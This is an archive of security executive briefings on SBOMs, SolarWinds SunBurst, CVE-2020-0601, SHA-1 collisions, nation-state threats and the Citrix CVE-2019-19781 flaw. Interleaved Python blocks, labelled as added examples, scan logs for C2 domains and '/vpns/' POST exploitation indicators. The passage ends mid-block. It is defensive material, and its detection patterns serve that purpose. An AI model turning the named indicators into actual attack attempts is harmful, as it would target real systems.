InGuardians Weekly Executive Briefing

Sign up for our once per week free executive information security briefing.  Concisely written executive summary of the one topic that our team has identified as top priority.


3/1/22 Building a Software Bill of Materials for key business applications



At the end of 2021, we saw the release of Log4Shell, a remote code execution exploit targeting a newly discovered critical vulnerability in the Log4j library. Hundreds of thousands of commercial and open source programs use Log4j to provide logging capabilities for Java. While the vulnerability is severe, the lack of knowledge of which programs use Log4j proved devastating. Organizations struggled to determine which information systems required patching, due to a severe lack of component inventory in their software. This component inventory can be provided via Software Bills of Materials (SBoMs).


When organizations don’t realize their running software contains vulnerable components, they cannot patch that software, and this leads to the compromise of systems.


For software distributors, SBoMs are helpful for informing your customers on the components used in your software development efforts.  Not all of us are in the business of distributing software, though. SBoMs can have uses outside of just providing information to your customers.

For many years, the Information Security industry has repeated the need for accurate network device inventory as a basic component of defense in-depth techniques. Since you can’t defend what you don’t know about, you need to go discover your network.

SBoMs are the next evolution of understanding what is on your network so that you can accurately defend it.  This knowledge gained from SBoMs can lead to more accurate patching, more tailored monitoring with specific attack detection rules for specific implementations, and detailed access restrictions (layer 3 network firewalls, host-based restrictions, and enhanced endpoint protection rules) for attacks should patches not be available.

Implementing SBoMs as a network defender can be effective with appropriate interaction or development:

1. When available, ask your vendors to provide SBoMs.

2. Not all vendors will have SBoMs available.  If possible, interview your vendors to create your own SBoMs for internal use.

3. If your organization creates software for internal use, insist that your developers create SBoMs and keep them updated.

4. If your organization utilizes open source software that lacks SBoMs, build SBoMs for your own internal use and consider contributing them to the upstream open source project.
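The inventory use the steps above aim at, shown as an added example (not code from the InGuardians briefing or from any SBoM tool): cross-reference per-application SBoMs against one vulnerable component and report which applications need patching. The SBoMs are constructed inline in a reduced CycloneDX-like shape (name, version, purl only), and the component and version range are hypothetical inputs, not an advisory's values.

```python
"""Cross-reference per-application SBOMs against one vulnerable component.

Added example, not from the InGuardians briefing or any SBOM tool. The SBOMs are
constructed inline in a reduced CycloneDX-like shape (only name, version, purl);
the component and version range are hypothetical inputs, not an advisory's values.
"""
import re

SAMPLE_SBOMS = {
    "billing-portal": {
        "metadata": {"component": {"name": "billing-portal", "version": "3.2.0"}},
        "components": [
            {"name": "log4j-core", "version": "2.14.1",
             "purl": "pkg:maven/org.apache.logging.log4j/log4j-core@2.14.1"},
            {"name": "spring-web", "version": "5.3.9",
             "purl": "pkg:maven/org.springframework/spring-web@5.3.9"},
        ],
    },
    "hr-system": {
        "metadata": {"component": {"name": "hr-system", "version": "1.0.4"}},
        "components": [
            {"name": "log4j-core", "version": "2.17.1",
             "purl": "pkg:maven/org.apache.logging.log4j/log4j-core@2.17.1"},
        ],
    },
    "inventory-api": {
        "metadata": {"component": {"name": "inventory-api", "version": "7.1"}},
        "components": [
            # Same vendor namespace, different artifact: must not match log4j-core.
            {"name": "log4j-api", "version": "2.14.1",
             "purl": "pkg:maven/org.apache.logging.log4j/log4j-api@2.14.1"},
            {"name": "logback-classic", "version": "1.2.6",
             "purl": "pkg:maven/ch.qos.logback/logback-classic@1.2.6"},
        ],
    },
}


def parse_version(version):
    """'2.14.1-rc1' -> (2, 14, 1); comparison stops at the first non-numeric piece."""
    parts = []
    for piece in version.split("."):
        m = re.match(r"\d+", piece)
        if not m:
            break
        parts.append(int(m.group()))
    return tuple(parts)


def version_in_range(version, first_affected, fixed_in):
    """True if first_affected <= version < fixed_in."""
    v = parse_version(version)
    return parse_version(first_affected) <= v < parse_version(fixed_in)


def purl_base(purl):
    """'pkg:maven/ns/name@1.2?type=jar' -> 'pkg:maven/ns/name' (version, qualifiers dropped)."""
    return purl.split("@", 1)[0].split("?", 1)[0]


def components_matching(sbom, component_purl):
    """Versions of the given component present in one SBOM."""
    return [c["version"] for c in sbom.get("components", [])
            if purl_base(c.get("purl", "")) == component_purl]


def affected_applications(sboms, component_purl, first_affected, fixed_in):
    """Map application -> affected versions, for applications carrying an affected build."""
    hits = {}
    for app, sbom in sboms.items():
        versions = [v for v in components_matching(sbom, component_purl)
                    if version_in_range(v, first_affected, fixed_in)]
        if versions:
            hits[app] = versions
    return hits


if __name__ == "__main__":
    # Hypothetical range chosen for the sample data; take the real one from the advisory.
    for app, versions in affected_applications(
            SAMPLE_SBOMS, "pkg:maven/org.apache.logging.log4j/log4j-core",
            "2.0.0", "2.17.1").items():
        print(f"{app}: patch needed, ships log4j-core {', '.join(versions)}")
```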

Watch for the evolution of SBoM standards and tools. One initiative that shows a great deal of promise is GitBOM, an open source initiative driven by employees of Microsoft and Cisco, which aims to achieve the most critical component of an SBoM via a novel and simple mechanism.

Additional Resources


SBoM Resources from the National Telecommunications and Information Administration

2/1/22 Prepare for Fallout from Escalating Cyber Warfare





The developing situation in Ukraine has multiple state and non-state actors working to further destabilize the region.  Large-scale cyber attacks are already in play.  Government agencies and pundits are warning of the downstream effects of these attacks.



Organizations based in Ukraine or who do business in Ukraine may find themselves directly targeted by cyberattacks during this tumultuous period.  Furthermore, if the United States or NATO intercedes directly in the Ukraine-Russia situation, organizations outside Ukraine may be subject to retaliatory attacks. 


InGuardians has established three primary categories of organizations which may be directly impacted by these events:

  • Organizations based in, or with operations located in, Ukraine.
  • Organizations in the US or Europe responsible for providing critical infrastructure, such as:
    • Healthcare
    • Transportation
    • Power
    • Water
    • Food production and/or distribution
  • Organizations directly supporting Ukraine, US, or NATO governmental agencies.

While the above categories encompass organizations InGuardians believes may be directly targeted by Russian cyberattacks, all organizations should prepare carefully and assume they may be the target of a potential attack. As evidenced by the NotPetya malware outbreak in 2017, which has been attributed to a Russian cyberattack against Ukraine, any organization may be impacted unintentionally by nation-state cyber attacks.


These attacks could result in Denial-of-Service conditions but may escalate to attacks against critical infrastructures, such as healthcare, transportation, power, water, and food processing/distribution. While denial of service attacks can impact business operations, the real risk presented is that of attacks against critical infrastructure.


In addition to the above, InGuardians believes that the current situation is also ripe for false flag operations.  Attribution for cyber attacks is rife with problems, and often sources are manipulated to fit the narrative of the attackers.



InGuardians recommends that organizations based in Ukraine, or with operations within Ukraine, increase monitoring efforts, particularly on Ukraine-based infrastructure and network connections to and from Ukraine, including VPN tunnels. Consider increasing SOC staffing until the situation has calmed. Consider temporarily severing unnecessary network connections to Ukraine to minimize the impact of potential attacks. Finally, consider evaluating trust boundaries for such locations.


InGuardians furthermore recommends that all organizations, regardless of whether they fall into one of the at-risk categories previously described, undertake the following actions: 

  • Ensure that all Incident Response and Business Continuity Plans are up to date and that copies are available to all relevant staff. Physical copies of such plans should be distributed to key staff in the event that digital copies are unavailable.
  • Review information systems backup procedures – are they doing what you think they are doing? Review system restoration plans – when was the last time they were tested?
  • Consider conducting immediate tabletop exercises and/or supplemental training focused on potential outcomes of Russian cyber attacks. 
  • Ensure that all critical systems have been recently backed up. Consider storing backup copies in secure facilities in physically disparate regions, and consider testing backups by performing full restore-from-backup tests on a subsample of critical systems. 
  • Remind all staff of the dangers of social engineering attacks. Provide examples of possible attacks, discuss how users should respond to such attacks, and reiterate the importance of reporting such attacks as soon as they are identified, particularly if staff “fall for” the attack. 
  • If directly reliant on third-party services directly connected to network resources, increase monitoring of these services. It is possible that organizations may be exposed to attack through services they rely upon. 
  • Consider setting up “honeytokens” in your environment to get notified about any suspicious activity within your networks, databases, etc. A simple solution would be Canary Tokens.
  • Ensure that AV signatures are up to date and software is patched. 
    • Be sure to evaluate patches in a test environment before distributing them across the organization. Supply chain software attacks may render some patches unsafe during this time, requiring additional rigor during patch testing. 
  • Monitor outbound traffic for Ukraine and Russian destinations, in order to determine whether your organization is being used to attack either country.

Additional Resources


CISA Advisory


ABC News – DHS warns of Russian cyberattack on US if it responds to Ukraine invasion


President Biden remarks in Press Confere

12/16/20 Solarwinds Supply Chain Attack Leads To Large-scale Exploitation

Solarwinds Orion monitoring software was compromised with a backdoor between May and June of this year, 2020.
About SolarWinds and SunBurst

SolarWinds Orion Network Management Solution (NMS) has come under scrutiny as the initial vector of attack for APT29/Cozy Bear, with specific compromises discovered in several US government agencies and one public sector cyber security company, FireEye. While it is not yet clear whether these were attacks against specific targets, it is possible to surmise that approximately 18,000 to 33,000 SolarWinds customers could be affected.

SunBurst is the name given to the backdoor inserted into core functionality of the SolarWinds Orion NMS code. SunBurst is a Command and Control (C2) method, allowing full control of the SolarWinds Orion platform and underlying operating system. This probable compromise of the internal build or distribution system subsequently delivered the backdoor to platform customers via automatic updates. This is of particular concern because NMS installations often have ties to monitor and configure a wide range of other technology components within an organization, including Windows Active Directory, credential management, network configuration, firewall management, and network intrusion detection. This could allow an attacker to modify any of these systems, cover their tracks, and evade detection across all of the platforms managed by the NMS.

In addition, as these types of systems often require broad ranges of access, typical strategies to segment or restrict traffic may prove ineffective controls against this vector of attack.

Specifically, SolarWinds customers should perform the following steps:
  • Identify whether or not you are running the Orion NMS platform.
  • Verify whether or not your organization has opted into the sharing of debug information from the Orion platform back to Solarwinds.  If no determination can be made, one should assume that debug information sharing is enabled and that the platform is compromised.
  • Compare the SHA256/SHA1/MD5 hashes of “SolarWinds.Orion.Core.BusinessLayer.dll” to known ‘bad’ versions to determine compromise. If the version(s) present in one’s current implementation do not match known versions, consider uploading them to various online analysis services. If known bad versions are discovered, the organization should implement its Incident Response plan immediately in order to assess risk and next steps.
  • Investigate collected logs to determine whether systems on the enterprise network have contacted domains known to be associated with SunBurst C2 servers. If so, the organization should implement its Incident Response plan immediately in order to begin containing and eradicating the compromise.
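The hash comparison and C2-domain log review from the steps above, as an added example (not InGuardians' or SolarWinds' code). The known-bad hashes, known-good hashes, C2 domains and DNS log lines are constructed placeholders; substitute the values published in the advisories linked below.

```python
"""Two checks from the list above: hash every copy of the Orion business-layer DLL
against known-bad/known-good sets, and scan DNS query logs for known C2 domains.
Added example, not InGuardians' or SolarWinds' code. All indicator values and
log lines here are constructed placeholders, not real indicators."""
import hashlib
import os
import re
import tempfile

DLL_NAME = "SolarWinds.Orion.Core.BusinessLayer.dll"

# PLACEHOLDERS: fill these from the vendor and FireEye advisories; the values
# here are deliberately not real indicators.
KNOWN_BAD_SHA256 = {"0" * 64}
KNOWN_GOOD_SHA256 = {"1" * 64}
KNOWN_C2_DOMAINS = {"c2.example.invalid"}


def sha256_of_file(path, chunk_size=1 << 20):
    """Stream the file so large binaries do not have to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk_size), b""):
            digest.update(block)
    return digest.hexdigest()


def find_dll_copies(root, dll_name=DLL_NAME):
    """Every path under root whose file name matches dll_name (case-insensitive,
    since Windows file systems are)."""
    wanted = dll_name.lower()
    return sorted(
        os.path.join(dirpath, name)
        for dirpath, _, names in os.walk(root)
        for name in names
        if name.lower() == wanted
    )


def classify_dll(path, known_bad=KNOWN_BAD_SHA256, known_good=KNOWN_GOOD_SHA256):
    """Return (sha256, verdict). KNOWN_BAD means start the IR plan; UNKNOWN is the
    case the briefing says to submit to an online analysis service."""
    digest = sha256_of_file(path)
    if digest in known_bad:
        return digest, "KNOWN_BAD"
    if digest in known_good:
        return digest, "KNOWN_GOOD"
    return digest, "UNKNOWN"


# Constructed resolver-log shape: "<timestamp> <client-ip> query <qname> <qtype>".
DNS_LINE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\d{1,3}(?:\.\d{1,3}){3})\s+query\s+(?P<qname>\S+)")

SAMPLE_DNS_LOG = [
    "2020-12-14T03:11:07Z 10.20.5.17 query orion-01.corp.example A",
    "2020-12-14T03:11:09Z 10.20.5.17 query abc123.c2.example.invalid A",
    "2020-12-14T03:12:40Z 10.20.7.3 query updates.example.com A",
    "malformed line that should be skipped",
    "2020-12-14T03:13:02Z 10.20.5.17 query C2.EXAMPLE.INVALID. A",
]


def qname_matches(qname, domains):
    """Match the domain itself or any subdomain, ignoring case and a trailing dot."""
    q = qname.rstrip(".").lower()
    return any(q == d or q.endswith("." + d) for d in domains)


def scan_dns_log(lines, domains=KNOWN_C2_DOMAINS):
    """(timestamp, client, qname) for every query to a listed domain; bad lines skipped."""
    hits = []
    for line in lines:
        m = DNS_LINE.match(line)
        if m and qname_matches(m.group("qname"), domains):
            hits.append((m.group("ts"), m.group("client"), m.group("qname")))
    return hits


def make_sample_tree():
    """Throwaway directory holding a constructed (not real) DLL file for a dry run."""
    root = tempfile.mkdtemp(prefix="orion-check-")
    os.makedirs(os.path.join(root, "Orion"))
    with open(os.path.join(root, "Orion", DLL_NAME), "wb") as fh:
        fh.write(b"constructed sample bytes, not a real SolarWinds binary\n")
    return root


if __name__ == "__main__":
    for dll in find_dll_copies(make_sample_tree()):
        print(dll, *classify_dll(dll))
    for hit in scan_dns_log(SAMPLE_DNS_LOG):
        print("C2 lookup:", *hit)
```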

Overall recommendations include the adoption of strict egress firewall rules to prevent the NMS from reaching out to any host on the internet. If internet access is required for product updates, it should only be available for the limited time of that upgrade action. Additionally, increased monitoring should be enacted, with the FireEye YARA rules (linked below) as a base, noting that subsequent attacks will evolve.

Non-SolarWinds Orion customers should consider implementing the overall recommendations for any other NMS that may be in use.

If you need assistance in determining whether or not you’ve been compromised or are vulnerable to this attack, contact us at or call +1.202.448.8958

Additional Resources
SolarWinds Security Advisory

YARA rules to detect sunburst

Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor

Customer Guidance on Recent Nation-State Cyber Attacks

Broad Cyber Espionage Campaign Follows Supply Chain Attack on SolarWinds

3/11/20 Coronavirus-Themed Attacks on the Rise


As the Wuhan Coronavirus (COVID-19) continues to dominate news cycles and spread across the globe at an alarming rate, COVID-19-themed attacks are rising with it. Phishing campaigns with malicious PDFs masquerading as COVID-19 fact sheets and cleaning tips are on the rise. These PDFs are droppers that connect to remote command and control servers and implant malware on the endpoint. Another attack uses a link that directs a user to log in to a website, which then redirects them to a valid CDC page of tips on the COVID-19 virus. This attack attempts to steal the user’s credentials for further attacks.

With the COVID-19 virus gaining traction in the public mind, phishing attacks and social engineering attacks preying on users are on the rise. The risk of compromise is increased due to the sheer number of phishing attempts and new tactics that might not get caught by current security controls.

InGuardians recommends that end users are given extra reminders and training surrounding phishing and social engineering attacks. InGuardians also recommends following signature updates closely, in order to push signatures to your security products more quickly.

Additional Resources
Article from Threatpost

Article from the Wall Street Journal

Article from Vox

2/13/20 Coronavirus: now is a good time to revisit your Business Continuity Plan.


With the novel coronavirus (2019-nCOV) threatening to spread beyond Chinese containment efforts, now is a good time to examine your organization’s Business Continuity Plan (BCP).

During an emergency, one of the first things InGuardians recommends is identifying reliable sources of information.  Many news sites are guilty of writing headlines to sell news, rather than simply reporting on new information.

In the case of the coronavirus outbreak, InGuardians recommends obtaining information and updates from the World Health Organization (WHO) and the Centers for Disease Control and Prevention (CDC). These two organizations are reliable and maintain up-to-date information about the spread of the virus, as well as pertinent prevention steps. As new sources of information are evaluated, we recommend checking them against the WHO and CDC for accuracy and veracity.

The WHO has declared 2019-nCOV a global health emergency.  This is short of a pandemic, but still should warrant careful consideration, with emergency measures put in place.

The second issue to address is how, if at all, your business needs to change in order to keep your personnel and customers safe during continued business operations.

Beyond the hype and fear that epidemics of this magnitude and severity usually prompt, it is imperative that your organization focus on conducting business. Below is a sampling of questions to help answer how much your business may have to change if this epidemic continues to spread.

•    How much of your business requires travel?
•    Does your business require products or services originating in the affected areas?
•    Which critical business operations can be conducted remotely?
•    Do your personnel have computing resources and VPN access to be able to work remotely?
•    Do your business data centers have the necessary bandwidth, VPN capacity and such to handle a larger percentage of staff working remotely?

Establish an official communication channel
This is key during a crisis, as rumor mills tend to spread miscommunication faster than it can be undone. Establish an official communication channel that allows senior management to communicate swiftly and effectively to all employees as well as to particular groups. E-mail may be most effective, reinforced by official internal company resources such as a blog, the company’s internal portal, and video messages.

Communicating often and clearly will help quell the rumor mill.  This will also empower your employees to do good research and make their own decisions about their own safety and that of their families.

Enable staff to work remotely
Work with your IT staff to determine what your current capacity is for remote workers. Consider the possibility that over 80% of your workforce may be working from home.

Determine whether the employees that could work remotely have the computing requirements to do so.  Do they have laptops, internet access, and current VPN credentials? How many have tested and verified their VPN access recently?

Limit unnecessary travel
Examine the next three months of travel and consider making alternate plans.  Plan on avoiding air travel and large gatherings.  Consider isolating individuals who must travel, particularly those who will attend conferences, in order to keep your personnel and clients safe.

Identify essential staff positions and create backups for each critical role
Identify roles that are critical to your business operations.  Once key staff are identified, create backups to that role if they were to become unable to perform that task.  In our company we look for critical roles that have a “bus factor” of 1, finding alternate staff members who can execute those critical roles in case the primary employee can no longer do so.

Establish Crisis Management Teams
Many organizations overlook Crisis Management Teams (CMTs) for handling emergency situations. Establish these Crisis Management Teams ahead of time. Much like Incident Responders, CMTs are critical during a crisis. The CMT is responsible for making critical decisions and disseminating them, such as when and whether to shelter in place during an active shooter incident or when to work remotely during a health emergency.

Additional Resources
“What does the coronavirus mean for your business continuity plan?” (Infotech)

Best practices how to create an effective business continuity plan (CIO)

Write your business continuity plan (Cleverism)

2/5/20 Bad internal communications are bad security.

The United Nations failed to patch Microsoft SharePoint services, but then made it worse. The UN didn’t patch SharePoint, got mega-hacked, covered it up, kept most staff in the dark, finally forced to admit it. The United Nations’ European headquarters in Geneva and Vienna were hacked last summer, putting thousands of staff records at miscreants’ fingertips.

The hack was a result of ineffective patch management procedures and exposed multiple servers. The external security group brought in had to proceed on the assumption that the entire domain was compromised. As bad as that was, the breach was made worse by the failure to inform the organization. No damage assessment was possible, no internal changes were made to address exposure or risk, and apparently no information was passed to the relevant management and leadership levels. This is not simply a UN issue. InGuardians frequently deals with similarly flawed internal communications at clients. We treat it as a finding when we observe a breakdown in communications among internal staff, from IT security to management. Sometimes it is a failure to recognize that other groups need to be aware of risks; sometimes it is a failure to transmit internal security policies to users. Broad industry experience suggests security challenges are everywhere and that it is not a question of if you will be hacked but when. Keeping a security event secret may be tempting for those directly involved, but such secrets are rarely sustainable and always make the eventual clean-up harder.

Review organization-wide policies for patching, security event monitoring, and security reporting. All are critically important to the overall management of any data environment. After review, actually practice the internal reporting mechanisms to see if people understand the policies. A simple table-top or paper exercise, such as a note reading “Suspected data compromise of file xxx.docx on server yyyyy” handed to a member of the network security staff, could start a drill. Note times, methods of discovery, and who communicates to whom. Remember that security is never a static exercise and is constantly evolving to meet the needs of the organization and data environment.

Additional Resources
UN didn’t patch SharePoint, got mega-hacked, covered it up, kept most staff in the dark, finally forced to admit it

1/27/20 Windows certificate spoofing vulnerability


On January 14, 2020, Microsoft released a patch for Windows 8.1, 10, and Server 2016, addressing a flaw allowing anyone to bypass the normal process to validate digital certificates that use Elliptic Curve Cryptography (ECC). This happens because Windows fails to validate that the ECC parameters provided match published standard values and instead accepts offered values that differ from the standard but produce a final result that matches the expected result.
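The check the briefing describes as missing, written out as an added example (not Microsoft's code or InGuardians'): when a certificate offers explicit ECC domain parameters, each one must equal the published value for the named curve; confirming only that the offered generator lies on the curve, or that the arithmetic works out, is not enough. The P-256 constants are the published standard values; the non-standard parameter set is constructed for the demonstration.

```python
"""Domain-parameter check for an ECC key that claims the NIST P-256 curve.

Added example, not from the InGuardians briefing or from Microsoft. Every
explicit parameter must equal the published standard value, not merely be
mathematically self-consistent. P-256 constants are the FIPS 186-4 values.
"""

# Published NIST P-256 (secp256r1) domain parameters.
P256 = {
    "p": 0xFFFFFFFF00000001000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF,
    "a": 0xFFFFFFFF00000001000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFC,
    "b": 0x5AC635D8AA3A93E7B3EBBD55769886BC651D06B0CC53B0F63BCE3C3E27D2604B,
    "gx": 0x6B17D1F2E12C4247F8BCE6E563A440F277037D812DEB33A0F4A13945D898C296,
    "gy": 0x4FE342E2FE1A7F9B8EE7EB4A7C0F9E162BCE33576B315ECECBB6406837BF51F5,
    "n": 0xFFFFFFFF00000000FFFFFFFFFFFFFFFFBCE6FAADA7179E84F3B9CAC2FC632551,
    "h": 1,
}
PARAMETER_KEYS = ("p", "a", "b", "gx", "gy", "n", "h")


def is_on_curve(x, y, params):
    """True if (x, y) satisfies y^2 = x^3 + a*x + b (mod p)."""
    p = params["p"]
    return (y * y - (x * x * x + params["a"] * x + params["b"])) % p == 0


def validate_explicit_parameters(offered, standard=P256):
    """Return (ok, reason). Any parameter differing from the named curve is rejected.

    An on-curve check alone would pass a self-consistent but non-standard set
    (for example a different generator); the field-by-field comparison is what
    closes that gap. The on-curve check stays as a sanity check on the constants."""
    for key in PARAMETER_KEYS:
        if key not in offered:
            return False, f"missing parameter {key}"
        if offered[key] != standard[key]:
            return False, f"parameter {key} does not match the named curve"
    if not is_on_curve(offered["gx"], offered["gy"], offered):
        return False, "generator is not on the curve"
    return True, "parameters match P-256"


def validate_public_key(qx, qy, params):
    """Public point must be on the validated curve and inside the field."""
    p = params["p"]
    if not (0 <= qx < p and 0 <= qy < p):
        return False, "coordinate out of range"
    if not is_on_curve(qx, qy, params):
        return False, "public key is not on the curve"
    return True, "public key is on the curve"


# Constructed sample: same curve equation, but the generator is the negation of
# the standard point, (x, p - y), which still lies on the curve.
NEGATED_GENERATOR = dict(P256, gy=P256["p"] - P256["gy"])

if __name__ == "__main__":
    print(validate_explicit_parameters(P256))
    print(validate_explicit_parameters(NEGATED_GENERATOR))
```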

Digital certificates can be used to secure HTTPS connections, digitally sign executable files, or sign email messages. ECC is one of two common approaches to produce these certificates, the other being RSA. Certificate spoofing is an attack that allows an attacker to pretend to be a known, trusted entity.

A malicious agent could use this vulnerability to spoof a trusted certificate. They could then potentially intercept encrypted HTTPS connections to view or modify them; distribute applications with malicious code that pass validation; or alter digitally signed email in a way undetectable to an unpatched Windows installation.

Web proxy servers running on Windows are in an especially dangerous position, as they could be fooled into accepting malicious connections. If they trust a malicious certificate, the attacker can view or modify any traffic for client systems sending their web traffic through the proxy even if the clients are patched, because the clients trust the proxy. Most enterprise web proxies run on Linux- or BSD-based operating systems, but some smaller or legacy proxies may run on Windows.

While the released patches cover only officially supported versions of Windows, it is possible, perhaps likely, that all versions of Windows that support ECC are vulnerable. This may include Windows Vista and 7, as well as Server 2008 and 2008R2, all of which are no longer supported by Microsoft. Patches for those operating systems may be available through Microsoft’s Extended Security Update program, but this has cost requirements.

It should be noted that this issue is unrelated to last week’s discussion of the SHA-mbles attack against the SHA-1 hash algorithm, which is a general attack against the algorithm and not any specific operating system.

Installing the patch is the only known means of addressing this vulnerability at the time of this publication. While Microsoft originally rated this patch as “Important,” it admitted that it did so because it had not yet seen any public exploitation of the flaw. Other bodies such as the NSA, DHS, and US-CERT took a more aggressive approach, recommending that the patch be installed as soon as possible on all systems, with critical assets and those acting as proxies for other systems made a priority. A proof of concept was developed within a few days of the patch release, so exploit paths do exist in the wild.

Additional Resources
Microsoft Windows CryptoAPI Spoofing Vulnerability

NSA Cybersecurity Advisory: Patch Critical Cryptographic Vulnerability in Microsoft Windows Clients and Servers

CVE-2020-0601

1/16/20 New attack against SHA-1 algorithm allows practical document forgery


In January 2020, researchers released a new attack against the SHA-1 hash algorithm that greatly reduces the cost to find a collision. The researchers demonstrated how this attack, named “SHA-mbles,” can forge a PGP encryption key. This same attack threatens DNSSEC and OpenSSL.  This attack appears to have a direct impact on software supply chain security, as the git source management protocol uses a variation of SHA-1. It could also be used to forge digitally-signed documents, such as contracts, altering the terms of the agreement.

A hash algorithm applies mathematical functions to an input value to produce an output value that is, for practical purposes, unique to that input, avoiding a collision. A collision happens when two different input values produce the same output value, something that should not occur even if one could spend billions of years looking for one. Bad actors can use collisions to falsify file contents for purposes of fraud or theft. If the hash of the fraudulent file matches expectations for the real file, it may be accepted, even though its contents differ. The researchers use the example of a rental agreement digitally signed with SHA-1, where a malicious actor (renter or landlord) produces an agreement with different terms more amenable to that actor. It becomes much more difficult to determine who holds the real agreement.

This is not the first attack against SHA-1. NIST has considered it weak since 2011. The first practical attack, known as SHAttered, arrived in early 2017. That attack could generate two files with identical SHA-1 hashes, resulting in the ability to present a modified document as the original and have the hash-based signatures match. That attack had a projected cost in the ballpark of $500,000.

The SHA-mbles attack dramatically cuts the cost of creating a matching file to between $11,000 and $45,000 in a cloud computing environment, depending on certain elements.

Even at $45,000, this is considered a practical attack; a successful forgery may cost its victim millions of dollars. Also, historical trends indicate that attacks only get easier and cheaper over time. Attacks against SHA-1 became ten times cheaper over three years; in the next few years, they should be even less expensive, potentially requiring nothing more than powerful desktop hardware. This will make forgeries of documents signed with SHA-1 even more attractive.

InGuardians recommends that organizations update or harden the software described on the researchers’ site, including GPG, DNSSEC and OpenSSL.

There is no way to patch or update SHA-1 itself to defend against this. The only solution is to use a different hash algorithm, such as the SHA-2 or SHA-3 family, neither of which has any known significant weaknesses.

Web browsers stopped trusting SHA-1 on HTTPS certificates in 2017. Other software may still use and trust SHA-1. Some may eventually choose to stop trusting it, which may impact internal processes. It is important to get ahead of this.

It may be difficult to identify all cases where the SHA-1 hash is used. In addition to digital file signatures, it is sometimes used to store password representations in web applications; to validate DNS record responses when using DNSSEC; and, of course, for generating some PGP keys. Developers and vendors should be directed to identify where they might use SHA-1 and to replace it with modern algorithms. Password storage should instead use algorithms like Argon2id, which are designed to be heavily resistant to multiple attack vectors.

Additional Resources
Last week’s attack: SHA-1 is a Shambles

SHAttered attack

1/7/20 Corporations and Individuals Amongst Iran Cyber Targets


As geopolitical tensions rise, it’s important to remember that today’s threat landscape for corporations includes nation-state attacks.  Ever since the Stuxnet malware damaged Iran’s nuclear program, the country’s government has been building cyber warfare capabilities. Iran has a history of targeting corporations and individuals, whenever those targets were viewed as hostile to the country or controlled assets that would be useful in a cyber attack.

Iran has been implicated in attempts to infiltrate the email of government officials and journalists. The country has also taken aim at critical infrastructures, such as a dam in the city of Rye, New York and the oil production of Saudi Aramco. Iran has also targeted American companies, like when it attacked Sheldon Adelson’s casinos after Adelson made public comments that were opposed to Iran.

In the case of the Rye, New York dam, Iran was able to gain access to and control over much of the dam’s industrial control systems but fortunately could not impact the gate that controls the water level, as that system was off-line for maintenance at the time.

With Saudi Aramco, Iran was able to wipe out 35,000 Microsoft Windows computers after a phishing campaign. This occurred during the holiday of Eid, effectively shutting down oil production for weeks. It caused Aramco to disconnect from the internet.

Finally, after Sheldon Adelson made political comments opposed to Iran in 2013, Iran targeted his casinos in Las Vegas with malware, destroying roughly 75% of the servers that ran his casinos. This generated a cost of repair of over $40 million. A year passed before US intelligence officials declared that Iran was behind the attack.

Any organization involved with critical infrastructures, such as utilities or power generation facilities, should be on high alert.  These organizations are always highly-valued targets for attackers; however, now is a good time to renew the commitment to monitoring and searching for evidence of threats within those organizations.

All executives of major American corporations should be reminded to view themselves as targets of phishing campaigns and other potential attacks from nation-states.

Finally, all organizations with a digital footprint, no matter the industry, should view themselves as either a target of opportunity or a target of choice during times of tensions in the geopolitical landscape. It is important to remain vigilant and to periodically renew this sense of vigilance to ensure that all digital assets are as secure as possible from these types of attacks.

InGuardians Events & Resources
Article from Yahoo Finance regarding the attack on Sheldon Adelson

Article from The New York Times regarding the Aramco attack

Article from Time regarding the attack on the dam in Rye, NY

12/31/19 Critical Citrix Vulnerability


A vulnerability has been identified in Citrix Application Delivery Controller (ADC) formerly known as NetScaler ADC and Citrix Gateway formerly known as NetScaler Gateway.  If exploited, this vulnerability could allow an unauthenticated attacker to perform arbitrary code execution.  Currently, there is a workaround, but at the time of this writing, a firmware update has not yet been released.

The impact of this vulnerability is quite high, with an estimated 80,000 companies scrambling to apply the mitigation while waiting for Citrix to release a firmware upgrade. Any remote code execution (RCE) vulnerability is a concern.

The current advisory and publicly released information are only exposing an unauthenticated file upload capability.  The current unauthenticated upload capability has some challenges with the format in which the files end up on the NetScaler filesystem, but additional research is still being conducted.  A publicly available RCE has not yet been released as of this writing, as additional work needs to be done, through experimentation using the current knowledge.

However, this CVE has been noted as being an RCE condition, indicating that it is possible to conduct the attacks given enough knowledge. In this scenario, should RCE be successful, complete compromise of the NetScaler device from the internet is possible. It would then be conceivable for the NetScaler device to be leveraged to attack additional infrastructure, including the systems it is connected to as part of its configuration; internal applications, directory providers (AD), and third-party resources are all within range for exploitation and full compromise.

Currently, no patch is available from Citrix, yet there are several things that can be accomplished in the meantime:

1.    Implement the workaround advised by Citrix as an interim measure until an official patch is released.
2.    Add monitoring and detection for HTTP/HTTPS POST requests to NetScaler platforms containing the “/vpns/” string, the initial compromise indicator, and watch for unusual behavior from the NetScaler devices themselves.
3.    Closely monitor further releases on CVE-2019-19781, and apply Citrix’s patches immediately upon release.
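A small scanner for the detection in item 2, as an added example (it is neither Citrix’s mitigation nor code from the original briefing): it parses combined-format web-server or proxy access logs and flags POST requests whose path contains “/vpns/”, after percent-decoding and case-folding the path so encoded variants of the indicator are not missed. The log lines, client addresses and the request path in them are constructed for the demo.

```python
"""Scan access logs for the CVE-2019-19781 indicator described above:
HTTP POST requests whose path contains "/vpns/".

Added example; it is not part of the briefing and not Citrix's mitigation.
It assumes logs in the common Apache/NGINX "combined" format; the sample
lines below are constructed, not captured from a real device.
"""
import re
from urllib.parse import unquote

# Combined log format: client ident user [time] "METHOD path PROTO" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log: two POSTs carry the indicator (one percent-encoded), two lines do not.
SAMPLE_LOG = """\
203.0.113.5 - - [31/Dec/2019:10:00:01 +0000] "GET /vpn/index.html HTTP/1.1" 200 1511 "-" "Mozilla/5.0"
203.0.113.9 - - [31/Dec/2019:10:00:02 +0000] "POST /vpns/portal/example.pl HTTP/1.1" 200 14 "-" "curl/7.58"
203.0.113.9 - - [31/Dec/2019:10:00:03 +0000] "POST /%56pns/portal/example.pl HTTP/1.1" 200 14 "-" "curl/7.58"
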